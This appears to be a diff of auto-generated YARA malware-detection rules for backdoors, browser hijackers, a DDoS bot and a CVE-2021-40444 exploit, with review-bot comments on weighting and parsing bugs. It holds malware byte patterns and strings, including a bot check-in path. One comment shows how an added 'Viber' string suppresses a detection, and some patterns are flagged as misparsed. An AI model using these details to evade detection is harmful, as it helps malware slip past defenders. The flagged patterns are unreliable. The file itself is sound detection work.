$a_01_1 = {2f 73 65 61 72 63 68 3f 68 6c 3d 65 6e 26 71 } //65534 /search?hl=en&q
$a_01_0 = {63 61 63 6c 73 2e 65 78 65 20 63 3a 5c } //-1 cacls.exe c:\
$a_01_1 = {2f 73 65 61 72 63 68 3f 68 6c 3d 65 6e 26 71 } //-2 /search?hl=en&q
$a_00_2 = {5c 53 79 73 74 65 6d 33 32 5c 73 76 63 68 6f 73 74 2e 65 78 65 20 2d 6b } //1 \System32\svchost.exe -k
$a_01_3 = {00 49 6e 73 74 61 6c 6c 00 52 75 6e } //1 䤀獮慴汬刀湵
$a_03_4 = {2e 50 41 58 00 00 00 00 90 01 08 2e 50 41 44 00 90 00 } //1
@ -13,6 +13,6 @@ rule Backdoor_Win32_Venik_E_dha{
$a_03_6 = {3d 02 00 00 32 0f 87 90 01 04 0f 84 90 01 04 3d 03 00 00 31 90 00 } //1
$a_01_7 = {8b 44 24 08 8a 08 32 ca 02 ca 88 08 40 4e 75 f4 } //1
condition:
((#a_01_0 & 1)*65535+(#a_01_1 & 1)*65534+(#a_00_2 & 1)*1+(#a_01_3 & 1)*1+(#a_03_4 & 1)*1+(#a_03_5 & 1)*1+(#a_03_6 & 1)*1+(#a_01_7 & 1)*1) >=3
((#a_01_0 & 1)*-1+(#a_01_1 & 1)*-2+(#a_00_2 & 1)*1+(#a_01_3 & 1)*1+(#a_03_4 & 1)*1+(#a_03_5 & 1)*1+(#a_03_6 & 1)*1+(#a_01_7 & 1)*1) >=3
}
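Review bot: The `$a_03_*` strings on the new side still carry Defender's pattern escapes as literal bytes: in `$a_03_6` the `90 01 04` after `0f 87` (`ja`) and after `0f 84` (`je`) sits exactly where the 4-byte displacement belongs, which reads as "skip 4 bytes", and `90 00` closes each pattern. Left literal, those byte runs will essentially never appear in real code, so `$a_03_4` and `$a_03_6` are dead and the `>=3` threshold must be met by the remaining strings alone. Emitting YARA jumps instead, e.g. `$a_03_6 = {3d 02 00 00 32 0f 87 [4] 0f 84 [4] 3d 03 00 00 31}`, restores the intended match, and the generator should do that for every `90 01 NN` / `90 00` it sees. Separately, the comment on `$a_01_3` decodes `00 49 6e 73 74 61 6c 6c 00 52 75 6e` as UTF-16 (`䤀獮慴汬刀湵`); it is ASCII `\0Install\0Run`.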


@ -5,8 +5,8 @@ rule Backdoor_Win64_SignJoinInstaller_A{
strings :
$a_03_0 = {c1 e1 03 48 8b 90 02 06 48 d3 ea 48 8b ca 0f b6 c9 33 c1 90 00 } //1
$a_01_1 = {4f 44 53 65 63 75 72 69 74 79 2e 64 6c 6c 00 44 6c 6c 43 61 6e 55 6e 6c 6f 61 64 4e 6f 77 00 6d 73 78 6d 6c 33 2e 64 6c 6c } //65535
$a_01_1 = {4f 44 53 65 63 75 72 69 74 79 2e 64 6c 6c 00 44 6c 6c 43 61 6e 55 6e 6c 6f 61 64 4e 6f 77 00 6d 73 78 6d 6c 33 2e 64 6c 6c } //-1
condition:
((#a_03_0 & 1)*1+(#a_01_1 & 1)*65535) >=1
((#a_03_0 & 1)*1+(#a_01_1 & 1)*-1) >=1
}
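Review bot: `$a_03_0` keeps `90 02 06` as literal bytes between the `48 8b` opcode and `48 d3 ea`; by analogy with the `90 01 NN` skips elsewhere in this commit that looks like a bounded wildcard (`[0-6]` in YARA), and as long as it stays literal the only positive string cannot match, so the rule is dead. With the condition now reduced to "`$a_03_0` present and `$a_01_1` absent", that one string is the whole detection and is worth fixing, e.g. `$a_03_0 = {c1 e1 03 48 8b [0-6] 48 d3 ea 48 8b ca 0f b6 c9 33 c1}`. The `-1` string has an empty comment because it contains NULs; it is the export-table fragment `ODSecurity.dll\0DllCanUnloadNow\0msxml3.dll`, which would be useful to record.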


@ -25,10 +25,10 @@ rule Backdoor_WinNT_PcClient{
$a_01_18 = {4b 65 53 65 72 76 69 63 65 44 65 73 63 72 69 70 74 6f 72 54 61 62 6c 65 } //1 KeServiceDescriptorTable
$a_01_19 = {50 73 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 49 64 } //1 PsGetCurrentProcessId
$a_01_20 = {5a 77 51 75 65 72 79 44 69 72 65 63 74 6f 72 79 46 69 6c 65 } //1 ZwQueryDirectoryFile
$a_01_21 = {6b 64 65 66 65 6e 73 65 } //65486 kdefense
$a_00_22 = {5c 70 72 75 65 62 61 5c 6d 69 70 72 75 65 62 61 5c 42 69 6e 5c } //65486 \prueba\miprueba\Bin\
$a_00_23 = {41 00 63 00 74 00 69 00 76 00 65 00 58 00 20 00 50 00 6f 00 72 00 74 00 65 00 63 00 74 00 6f 00 72 00 20 00 44 00 72 00 69 00 76 00 65 00 72 00 } //65486 ActiveX Portector Driver
$a_01_21 = {6b 64 65 66 65 6e 73 65 } //-50 kdefense
$a_00_22 = {5c 70 72 75 65 62 61 5c 6d 69 70 72 75 65 62 61 5c 42 69 6e 5c } //-50 \prueba\miprueba\Bin\
$a_00_23 = {41 00 63 00 74 00 69 00 76 00 65 00 58 00 20 00 50 00 6f 00 72 00 74 00 65 00 63 00 74 00 6f 00 72 00 20 00 44 00 72 00 69 00 76 00 65 00 72 00 } //-50 ActiveX Portector Driver
condition:
((#a_00_0 & 1)*3+(#a_02_1 & 1)*3+(#a_02_2 & 1)*2+(#a_02_3 & 1)*4+(#a_02_4 & 1)*5+(#a_02_5 & 1)*5+(#a_02_6 & 1)*5+(#a_02_7 & 1)*4+(#a_00_8 & 1)*2+(#a_00_9 & 1)*2+(#a_00_10 & 1)*2+(#a_00_11 & 1)*3+(#a_00_12 & 1)*3+(#a_00_13 & 1)*3+(#a_00_14 & 1)*1+(#a_00_15 & 1)*1+(#a_00_16 & 1)*1+(#a_03_17 & 1)*3+(#a_01_18 & 1)*1+(#a_01_19 & 1)*1+(#a_01_20 & 1)*1+(#a_01_21 & 1)*65486+(#a_00_22 & 1)*65486+(#a_00_23 & 1)*65486) >=12
((#a_00_0 & 1)*3+(#a_02_1 & 1)*3+(#a_02_2 & 1)*2+(#a_02_3 & 1)*4+(#a_02_4 & 1)*5+(#a_02_5 & 1)*5+(#a_02_6 & 1)*5+(#a_02_7 & 1)*4+(#a_00_8 & 1)*2+(#a_00_9 & 1)*2+(#a_00_10 & 1)*2+(#a_00_11 & 1)*3+(#a_00_12 & 1)*3+(#a_00_13 & 1)*3+(#a_00_14 & 1)*1+(#a_00_15 & 1)*1+(#a_00_16 & 1)*1+(#a_03_17 & 1)*3+(#a_01_18 & 1)*1+(#a_01_19 & 1)*1+(#a_01_20 & 1)*1+(#a_01_21 & 1)*-50+(#a_00_22 & 1)*-50+(#a_00_23 & 1)*-50) >=12
}


@ -78,9 +78,9 @@ rule BrowserModifier_MSIL_MediaArena_MTB_5{
$a_80_5 = {49 44 53 5f 45 44 47 45 5f 53 45 54 54 49 4e 47 53 5f 44 45 46 5f 42 52 4f 57 53 45 52 } //IDS_EDGE_SETTINGS_DEF_BROWSER 1
$a_80_6 = {42 72 6f 77 73 65 72 4c 6f 61 64 65 64 57 69 74 68 55 72 6c } //BrowserLoadedWithUrl 1
$a_80_7 = {43 4f 4c 4c 45 43 54 5f 44 41 54 41 5f 53 45 41 52 43 48 5f 45 4e 47 49 4e 45 } //COLLECT_DATA_SEARCH_ENGINE 1
$a_80_8 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe 65436
$a_80_9 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe 65436
$a_80_8 = {55 6e 69 6e 73 74 2e 65 78 65 } //Uninst.exe -100
$a_80_9 = {55 6e 69 6e 73 74 61 6c 6c 2e 65 78 65 } //Uninstall.exe -100
condition:
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_80_7 & 1)*1+(#a_80_8 & 1)*65436+(#a_80_9 & 1)*65436) >=8
((#a_80_0 & 1)*1+(#a_80_1 & 1)*1+(#a_80_2 & 1)*1+(#a_80_3 & 1)*1+(#a_80_4 & 1)*1+(#a_80_5 & 1)*1+(#a_80_6 & 1)*1+(#a_80_7 & 1)*1+(#a_80_8 & 1)*-100+(#a_80_9 & 1)*-100) >=8
}


@ -67,9 +67,9 @@ rule BrowserModifier_Win32_ClearSearch_5{
$a_00_4 = {49 45 5f 43 6c 72 53 63 68 2e 44 4c 4c } //3 IE_ClrSch.DLL
$a_00_5 = {43 6c 72 53 63 68 4c 6f 61 64 65 72 } //3 ClrSchLoader
$a_01_6 = {63 6c 72 73 63 68 2e 63 6f 6d 2f 6c 6f 61 64 65 72 } //3 clrsch.com/loader
$a_01_7 = {52 65 64 69 72 65 63 74 73 20 74 6f 20 63 65 72 74 61 69 6e 20 73 69 74 65 73 20 62 61 73 65 64 20 6f 6e 20 77 68 65 72 65 20 79 6f 75 20 62 72 6f 77 73 65 } //65531 Redirects to certain sites based on where you browse
$a_01_7 = {52 65 64 69 72 65 63 74 73 20 74 6f 20 63 65 72 74 61 69 6e 20 73 69 74 65 73 20 62 61 73 65 64 20 6f 6e 20 77 68 65 72 65 20 79 6f 75 20 62 72 6f 77 73 65 } //-5 Redirects to certain sites based on where you browse
condition:
((#a_00_0 & 1)*2+(#a_01_1 & 1)*3+(#a_01_2 & 1)*2+(#a_00_3 & 1)*3+(#a_00_4 & 1)*3+(#a_00_5 & 1)*3+(#a_01_6 & 1)*3+(#a_01_7 & 1)*65531) >=15
((#a_00_0 & 1)*2+(#a_01_1 & 1)*3+(#a_01_2 & 1)*2+(#a_00_3 & 1)*3+(#a_00_4 & 1)*3+(#a_00_5 & 1)*3+(#a_01_6 & 1)*3+(#a_01_7 & 1)*-5) >=15
}
rule BrowserModifier_Win32_ClearSearch_6{


@ -56,9 +56,9 @@ rule BrowserModifier_Win32_Diplugem_5{
strings :
$a_11_0 = {74 6d 6c 5f 6c 6f 61 64 65 72 2e 65 78 65 01 } //1
$a_8b_1 = {33 4f 04 81 e1 ff ff ff 7f 33 0f 8d 7f 04 8b c1 24 01 0f } //12544
$a_d8_2 = {c0 25 90 01 04 33 87 90 01 04 d1 e9 33 c1 89 87 90 01 04 4b 75 90 00 01 00 38 13 b9 04 01 00 00 29 c1 8d 84 45 d4 fb ff ff 89 4c 24 04 89 04 24 c7 44 24 0c 04 00 00 00 c7 44 24 08 90 01 04 e8 90 01 04 89 34 24 ff 15 90 01 04 83 ec 04 89 45 f0 90 00 00 00 02 00 78 c4 00 00 03 00 03 00 04 00 00 01 00 23 03 0f b6 49 01 29 c8 25 ff 00 00 00 88 c2 8b 45 90 01 01 89 c1 81 c1 01 00 00 00 89 4d 90 01 01 88 10 90 00 01 00 23 03 0f b6 52 01 29 d0 25 ff 00 00 00 88 c1 8b 45 90 01 01 89 c2 81 c2 01 00 00 00 89 55 90 01 01 88 08 90 00 01 00 4e 03 89 e2 8d 75 90 01 01 89 72 0c 89 0a c7 42 08 40 00 00 00 c7 42 04 00 10 00 00 8b 0d 90 01 04 89 45 90 01 01 ff d1 83 ec 10 8b 0d 90 01 04 ba 00 10 00 00 8b 75 90 01 01 8b 7d 90 01 01 89 34 24 89 7c 24 } //49334
$a_d8_2 = {c0 25 90 01 04 33 87 90 01 04 d1 e9 33 c1 89 87 90 01 04 4b 75 90 00 01 00 38 13 b9 04 01 00 00 29 c1 8d 84 45 d4 fb ff ff 89 4c 24 04 89 04 24 c7 44 24 0c 04 00 00 00 c7 44 24 08 90 01 04 e8 90 01 04 89 34 24 ff 15 90 01 04 83 ec 04 89 45 f0 90 00 00 00 02 00 78 c4 00 00 03 00 03 00 04 00 00 01 00 23 03 0f b6 49 01 29 c8 25 ff 00 00 00 88 c2 8b 45 90 01 01 89 c1 81 c1 01 00 00 00 89 4d 90 01 01 88 10 90 00 01 00 23 03 0f b6 52 01 29 d0 25 ff 00 00 00 88 c1 8b 45 90 01 01 89 c2 81 c2 01 00 00 00 89 55 90 01 01 88 08 90 00 01 00 4e 03 89 e2 8d 75 90 01 01 89 72 0c 89 0a c7 42 08 40 00 00 00 c7 42 04 00 10 00 00 8b 0d 90 01 04 89 45 90 01 01 ff d1 83 ec 10 8b 0d 90 01 04 ba 00 10 00 00 8b 75 90 01 01 8b 7d 90 01 01 89 34 24 89 7c 24 } //-16202
condition:
((#a_11_0 & 1)*1+(#a_8b_1 & 1)*12544+(#a_d8_2 & 1)*49334) >=3
((#a_11_0 & 1)*1+(#a_8b_1 & 1)*12544+(#a_d8_2 & 1)*-16202) >=3
}
rule BrowserModifier_Win32_Diplugem_6{
@ -210,9 +210,9 @@ rule BrowserModifier_Win32_Diplugem_17{
strings :
$a_13_0 = {4c 24 34 89 4c 24 20 89 5c 24 24 8b 4c 24 38 ff d1 8b 84 24 b0 00 00 00 8b 8c 24 b4 00 00 00 03 41 09 89 84 24 a8 00 00 00 ff 94 24 a8 00 00 00 c7 44 24 7c 90 01 04 e9 0d 00 00 00 b8 00 00 00 00 8d 65 f4 5e 5f 5b 5d c3 90 00 0a } //10
$a_c7_1 = {24 b4 00 00 00 00 00 00 00 c7 84 24 b0 00 00 00 00 00 00 } //28160
$a_24_2 = {00 00 00 00 00 00 00 c7 84 24 a8 00 00 00 00 00 00 00 c7 84 24 a4 00 00 00 00 00 00 00 e8 90 01 04 8d 0d 04 90 01 02 00 89 84 24 ac 00 00 00 a1 90 01 03 00 8b 15 00 90 01 02 00 8b b4 24 ac 00 00 00 89 34 24 89 54 24 04 89 4c 24 08 89 44 24 0c e8 90 00 01 00 5d 13 89 0c 24 c7 44 24 04 01 00 00 00 89 84 24 90 01 02 00 00 e8 90 01 04 89 84 24 90 01 02 00 00 8b 84 24 90 01 02 00 00 89 84 24 90 01 } //50944
$a_24_2 = {00 00 00 00 00 00 00 c7 84 24 a8 00 00 00 00 00 00 00 c7 84 24 a4 00 00 00 00 00 00 00 e8 90 01 04 8d 0d 04 90 01 02 00 89 84 24 ac 00 00 00 a1 90 01 03 00 8b 15 00 90 01 02 00 8b b4 24 ac 00 00 00 89 34 24 89 54 24 04 89 4c 24 08 89 44 24 0c e8 90 00 01 00 5d 13 89 0c 24 c7 44 24 04 01 00 00 00 89 84 24 90 01 02 00 00 e8 90 01 04 89 84 24 90 01 02 00 00 8b 84 24 90 01 02 00 00 89 84 24 90 01 } //-14592
condition:
((#a_13_0 & 1)*10+(#a_c7_1 & 1)*28160+(#a_24_2 & 1)*50944) >=21
((#a_13_0 & 1)*10+(#a_c7_1 & 1)*28160+(#a_24_2 & 1)*-14592) >=21
}
rule BrowserModifier_Win32_Diplugem_18{
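Review bot: Signing 49334/50944 into -16202/-14592 leaves `$a_8b_1` at 12544 and `$a_c7_1` at 28160 against thresholds of 3 and 21, so in Diplugem_5 one (odd-count) hit of the 19-byte `$a_8b_1` opcode run satisfies the rule on its own and `$a_d8_2` becomes an absolute exclusion; Diplugem_17 has the same shape. The string type codes in these two hunks (`11`, `8b`, `d8`, `13`, `c7`, `24`) occur nowhere else in this commit, where every other rule uses `00`/`01`/`02`/`03`/`80`, and both negative-weight patterns contain a `90 00` end-of-pattern marker followed by more bytes (`... 4b 75 90 00 01 00 38 13 ...`), which looks like several signature records parsed as one. Treating the weight as signed is probably not the right fix for these two rules; I would re-check the record boundaries in the source signature and until then mark them, e.g. `// FIXME: suspect record parse - type codes and weights are implausible`.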


@ -65,10 +65,10 @@ rule BrowserModifier_Win32_Istbar_F_2{
$a_01_45 = {63 3a 5c 76 6d 63 68 65 63 6b 2e 64 6c 6c } //2 c:\vmcheck.dll
$a_01_46 = {2f 69 73 74 64 6f 77 6e 6c 6f 61 64 5f 75 72 6c 5f 6c 6f 67 2e 70 68 70 } //5 /istdownload_url_log.php
$a_01_47 = {2f 69 73 74 5f 64 65 62 75 67 5f 6e 65 77 } //5 /ist_debug_new
$a_00_48 = {41 56 52 45 50 2e 64 6c 6c } //65526 AVREP.dll
$a_00_49 = {50 00 65 00 73 00 74 00 50 00 61 00 74 00 72 00 6f 00 6c 00 } //65526 PestPatrol
$a_00_50 = {45 63 68 6f 20 42 69 65 6e 76 65 6e 75 65 20 73 75 72 20 54 6f 6f 6c 62 61 72 53 68 6f 6f 74 65 72 } //65236 Echo Bienvenue sur ToolbarShooter
$a_00_48 = {41 56 52 45 50 2e 64 6c 6c } //-10 AVREP.dll
$a_00_49 = {50 00 65 00 73 00 74 00 50 00 61 00 74 00 72 00 6f 00 6c 00 } //-10 PestPatrol
$a_00_50 = {45 63 68 6f 20 42 69 65 6e 76 65 6e 75 65 20 73 75 72 20 54 6f 6f 6c 62 61 72 53 68 6f 6f 74 65 72 } //-300 Echo Bienvenue sur ToolbarShooter
condition:
((#a_01_0 & 1)*5+(#a_00_1 & 1)*3+(#a_01_2 & 1)*5+(#a_01_3 & 1)*5+(#a_00_4 & 1)*5+(#a_01_5 & 1)*3+(#a_01_6 & 1)*5+(#a_00_7 & 1)*3+(#a_01_8 & 1)*3+(#a_01_9 & 1)*3+(#a_01_10 & 1)*3+(#a_01_11 & 1)*2+(#a_01_12 & 1)*2+(#a_01_13 & 1)*2+(#a_01_14 & 1)*2+(#a_01_15 & 1)*2+(#a_01_16 & 1)*2+(#a_01_17 & 1)*3+(#a_01_18 & 1)*8+(#a_01_19 & 1)*8+(#a_01_20 & 1)*5+(#a_01_21 & 1)*5+(#a_01_22 & 1)*5+(#a_01_23 & 1)*5+(#a_01_24 & 1)*1+(#a_01_25 & 1)*1+(#a_01_26 & 1)*1+(#a_01_27 & 1)*1+(#a_01_28 & 1)*1+(#a_01_29 & 1)*1+(#a_01_30 & 1)*1+(#a_01_31 & 1)*1+(#a_01_32 & 1)*1+(#a_01_33 & 1)*1+(#a_01_34 & 1)*1+(#a_01_35 & 1)*1+(#a_01_36 & 1)*1+(#a_01_37 & 1)*1+(#a_01_38 & 1)*1+(#a_01_39 & 1)*1+(#a_01_40 & 1)*1+(#a_01_41 & 1)*5+(#a_01_42 & 1)*3+(#a_01_43 & 1)*3+(#a_01_44 & 1)*3+(#a_01_45 & 1)*2+(#a_01_46 & 1)*5+(#a_01_47 & 1)*5+(#a_00_48 & 1)*65526+(#a_00_49 & 1)*65526+(#a_00_50 & 1)*65236) >=20
((#a_01_0 & 1)*5+(#a_00_1 & 1)*3+(#a_01_2 & 1)*5+(#a_01_3 & 1)*5+(#a_00_4 & 1)*5+(#a_01_5 & 1)*3+(#a_01_6 & 1)*5+(#a_00_7 & 1)*3+(#a_01_8 & 1)*3+(#a_01_9 & 1)*3+(#a_01_10 & 1)*3+(#a_01_11 & 1)*2+(#a_01_12 & 1)*2+(#a_01_13 & 1)*2+(#a_01_14 & 1)*2+(#a_01_15 & 1)*2+(#a_01_16 & 1)*2+(#a_01_17 & 1)*3+(#a_01_18 & 1)*8+(#a_01_19 & 1)*8+(#a_01_20 & 1)*5+(#a_01_21 & 1)*5+(#a_01_22 & 1)*5+(#a_01_23 & 1)*5+(#a_01_24 & 1)*1+(#a_01_25 & 1)*1+(#a_01_26 & 1)*1+(#a_01_27 & 1)*1+(#a_01_28 & 1)*1+(#a_01_29 & 1)*1+(#a_01_30 & 1)*1+(#a_01_31 & 1)*1+(#a_01_32 & 1)*1+(#a_01_33 & 1)*1+(#a_01_34 & 1)*1+(#a_01_35 & 1)*1+(#a_01_36 & 1)*1+(#a_01_37 & 1)*1+(#a_01_38 & 1)*1+(#a_01_39 & 1)*1+(#a_01_40 & 1)*1+(#a_01_41 & 1)*5+(#a_01_42 & 1)*3+(#a_01_43 & 1)*3+(#a_01_44 & 1)*3+(#a_01_45 & 1)*2+(#a_01_46 & 1)*5+(#a_01_47 & 1)*5+(#a_00_48 & 1)*-10+(#a_00_49 & 1)*-10+(#a_00_50 & 1)*-300) >=20
}
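Review bot: The new `-10`/`-300` terms only subtract when the string's match count is odd, because `(#a_00_48 & 1)` is the low bit of the count rather than a presence flag; a file containing `AVREP.dll` twice contributes 0 and the exclusion silently disappears, and every positive term in the condition has the same parity behaviour. If presence is what is meant, YARA can express it without the bit trick through the math module (in versions that provide `math.min`), e.g. `import "math"` at the top of the file and `math.min(#a_00_48, 1)*-10` per term. This affects every rule in the commit, not just Istbar_F_2, so it belongs in the generator rather than a hand edit.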


@ -9,9 +9,9 @@ rule BrowserModifier_Win32_KipodToolsCby{
$a_01_2 = {4b 69 70 6f 64 54 6f 6f 6c 73 5c 4b 69 70 6f 64 54 6f 6f 6c 73 2e 63 70 70 } //1 KipodTools\KipodTools.cpp
$a_01_3 = {4f 6e 6c 79 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 63 6f 64 65 20 73 68 6f 75 6c 64 20 77 72 69 74 65 20 74 68 69 73 } //5 Only Internet Explorer code should write this
$a_01_4 = {53 00 6f 00 66 00 74 00 77 00 61 00 72 00 65 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 49 00 6e 00 74 00 65 00 72 00 6e 00 65 00 74 00 20 00 45 00 78 00 70 00 6c 00 6f 00 72 00 65 00 72 00 5c 00 41 00 70 00 70 00 72 00 6f 00 76 00 65 00 64 00 20 00 45 00 78 00 74 00 65 00 6e 00 73 00 69 00 6f 00 6e 00 73 00 } //5 Software\Microsoft\Internet Explorer\Approved Extensions
$a_01_5 = {56 69 62 65 72 } //65526 Viber
$a_01_6 = {56 00 69 00 62 00 65 00 72 00 } //65526 Viber
$a_01_5 = {56 69 62 65 72 } //-10 Viber
$a_01_6 = {56 00 69 00 62 00 65 00 72 00 } //-10 Viber
condition:
((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*5+(#a_01_4 & 1)*5+(#a_01_5 & 1)*65526+(#a_01_6 & 1)*65526) >=11
((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*5+(#a_01_4 & 1)*5+(#a_01_5 & 1)*-10+(#a_01_6 & 1)*-10) >=11
}
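Review bot: With both `Viber` terms at -10 and the positive terms summing to at most 13 against a threshold of 11, one occurrence of the five ASCII bytes `Viber` anywhere in the file suppresses the detection outright (13 - 10 = 3), and that is a string a packer or author can add for free; the wide form behaves the same. Negative-weight substrings are a false-positive damper, not something the detection should depend on, and that deserves a comment next to the two strings, e.g. `// FP damper only: attacker-addable, any odd count fully suppresses the rule`. If the exclusion exists for one specific legitimate Viber binary, a longer marker taken from that binary would be harder to borrow.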


@ -31,9 +31,9 @@ rule BrowserModifier_Win32_Xupiter{
$a_02_24 = {70 6f 70 75 6e 64 65 72 2e 68 74 6d 6c 90 02 20 70 6f 70 75 6e 64 65 72 2e 63 66 67 90 02 20 53 4f 46 54 57 41 52 45 5c 58 75 70 69 74 65 72 90 02 20 49 6e 73 74 61 6c 6c 61 74 69 6f 6e 20 46 6f 6c 64 65 72 90 02 20 50 6f 70 75 6e 64 65 72 90 02 20 43 50 6f 70 75 6e 64 65 72 44 6f 63 90 02 20 43 50 6f 70 75 6e 64 65 72 56 69 65 77 90 00 } //104
$a_02_25 = {4f 4c 44 5f 53 45 41 52 43 48 5f 48 4f 4f 4b 53 5f 4c 4f 43 41 4c 90 02 10 53 6f 66 74 77 61 72 65 5c 58 75 70 69 74 65 72 90 02 10 4f 4c 44 5f 53 45 41 52 43 48 5f 48 4f 4f 4b 53 5f 43 55 52 52 45 4e 54 90 00 } //104
$a_02_26 = {68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 77 69 72 65 2e 63 6f 6d 90 02 20 49 6e 74 65 72 6e 65 74 20 43 6f 6e 6e 65 63 74 69 6f 6e 20 54 65 73 74 90 02 20 53 71 77 69 72 65 90 02 20 44 6f 77 6e 6c 6f 61 64 3a 90 02 20 66 69 6c 65 2e 70 68 70 3f 66 69 6c 65 3d 90 02 20 26 61 69 64 3d 90 02 20 66 69 6c 65 69 6e 66 6f 2e 70 68 70 3f 66 69 6c 65 3d 90 02 20 26 73 69 64 3d 90 02 20 53 6f 66 74 77 61 72 65 5c 53 51 90 00 } //104
$a_00_27 = {41 64 76 61 6e 63 65 64 20 55 6e 69 6e 73 74 61 6c 6c 65 72 20 50 52 4f } //65236 Advanced Uninstaller PRO
$a_00_28 = {45 61 73 79 53 79 6e 63 20 50 72 6f } //65236 EasySync Pro
$a_00_27 = {41 64 76 61 6e 63 65 64 20 55 6e 69 6e 73 74 61 6c 6c 65 72 20 50 52 4f } //-300 Advanced Uninstaller PRO
$a_00_28 = {45 61 73 79 53 79 6e 63 20 50 72 6f } //-300 EasySync Pro
condition:
((#a_00_0 & 1)*100+(#a_00_1 & 1)*100+(#a_00_2 & 1)*100+(#a_00_3 & 1)*2+(#a_00_4 & 1)*2+(#a_00_5 & 1)*2+(#a_00_6 & 1)*2+(#a_00_7 & 1)*2+(#a_00_8 & 1)*2+(#a_00_9 & 1)*2+(#a_00_10 & 1)*2+(#a_00_11 & 1)*2+(#a_00_12 & 1)*2+(#a_00_13 & 1)*2+(#a_00_14 & 1)*2+(#a_00_15 & 1)*1+(#a_00_16 & 1)*1+(#a_00_17 & 1)*2+(#a_00_18 & 1)*2+(#a_00_19 & 1)*2+(#a_00_20 & 1)*2+(#a_00_21 & 1)*2+(#a_00_22 & 1)*2+(#a_00_23 & 1)*2+(#a_02_24 & 1)*104+(#a_02_25 & 1)*104+(#a_02_26 & 1)*104+(#a_00_27 & 1)*65236+(#a_00_28 & 1)*65236) >=104
((#a_00_0 & 1)*100+(#a_00_1 & 1)*100+(#a_00_2 & 1)*100+(#a_00_3 & 1)*2+(#a_00_4 & 1)*2+(#a_00_5 & 1)*2+(#a_00_6 & 1)*2+(#a_00_7 & 1)*2+(#a_00_8 & 1)*2+(#a_00_9 & 1)*2+(#a_00_10 & 1)*2+(#a_00_11 & 1)*2+(#a_00_12 & 1)*2+(#a_00_13 & 1)*2+(#a_00_14 & 1)*2+(#a_00_15 & 1)*1+(#a_00_16 & 1)*1+(#a_00_17 & 1)*2+(#a_00_18 & 1)*2+(#a_00_19 & 1)*2+(#a_00_20 & 1)*2+(#a_00_21 & 1)*2+(#a_00_22 & 1)*2+(#a_00_23 & 1)*2+(#a_02_24 & 1)*104+(#a_02_25 & 1)*104+(#a_02_26 & 1)*104+(#a_00_27 & 1)*-300+(#a_00_28 & 1)*-300) >=104
}


@ -8,9 +8,9 @@ rule DDoS_Win32_Abot_A{
$a_01_1 = {2f 67 61 74 65 2e 70 68 70 3f 68 77 69 64 3d } //1 /gate.php?hwid=
$a_01_2 = {26 6c 6f 63 61 6c 69 70 3d } //1 &localip=
$a_01_3 = {26 77 69 6e 76 65 72 3d } //1 &winver=
$a_00_4 = {4d 00 61 00 67 00 6e 00 65 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 2e 00 41 00 72 00 74 00 69 00 66 00 61 00 63 00 74 00 73 00 2e 00 64 00 6c 00 6c 00 } //65436 Magnet.Content.Artifacts.dll
$a_00_5 = {53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 2e 49 43 6f 6d 70 61 72 65 72 3c 4d 69 63 72 6f 73 6f 66 74 2e 53 6f 75 6e 64 65 72 2e 50 72 6f 74 6f 63 6f 6c 73 2e 46 72 61 6d 65 3e } //65436 System.Collections.Generic.IComparer<Microsoft.Sounder.Protocols.Frame>
$a_00_4 = {4d 00 61 00 67 00 6e 00 65 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 2e 00 41 00 72 00 74 00 69 00 66 00 61 00 63 00 74 00 73 00 2e 00 64 00 6c 00 6c 00 } //-100 Magnet.Content.Artifacts.dll
$a_00_5 = {53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 2e 49 43 6f 6d 70 61 72 65 72 3c 4d 69 63 72 6f 73 6f 66 74 2e 53 6f 75 6e 64 65 72 2e 50 72 6f 74 6f 63 6f 6c 73 2e 46 72 61 6d 65 3e } //-100 System.Collections.Generic.IComparer<Microsoft.Sounder.Protocols.Frame>
condition:
((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1+(#a_00_4 & 1)*65436+(#a_00_5 & 1)*65436) >=3
((#a_01_0 & 1)*1+(#a_01_1 & 1)*1+(#a_01_2 & 1)*1+(#a_01_3 & 1)*1+(#a_00_4 & 1)*-100+(#a_00_5 & 1)*-100) >=3
}


@ -5,23 +5,23 @@ rule Exploit_Win64_CVE-2021-40444_A{
strings :
$a_00_0 = {5c 00 63 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 2e 00 65 00 78 00 65 00 00 00 } //2
$a_00_1 = {69 00 6e 00 70 00 75 00 74 00 2e 00 64 00 6c 00 6c 00 } //65526 input.dll
$a_00_2 = {20 00 50 00 72 00 69 00 6e 00 74 00 65 00 72 00 73 00 } //65526 Printers
$a_00_3 = {20 00 53 00 59 00 53 00 54 00 45 00 4d 00 } //65526 SYSTEM
$a_00_4 = {2f 00 6e 00 61 00 6d 00 65 00 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 } //65526 /name Microsoft.
$a_00_5 = {5c 00 4b 00 65 00 79 00 70 00 61 00 64 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 2e 00 65 00 78 00 65 00 } //65526 \KeypadControl.exe
$a_00_6 = {20 00 64 00 65 00 73 00 6b 00 2e 00 63 00 70 00 6c 00 } //65526 desk.cpl
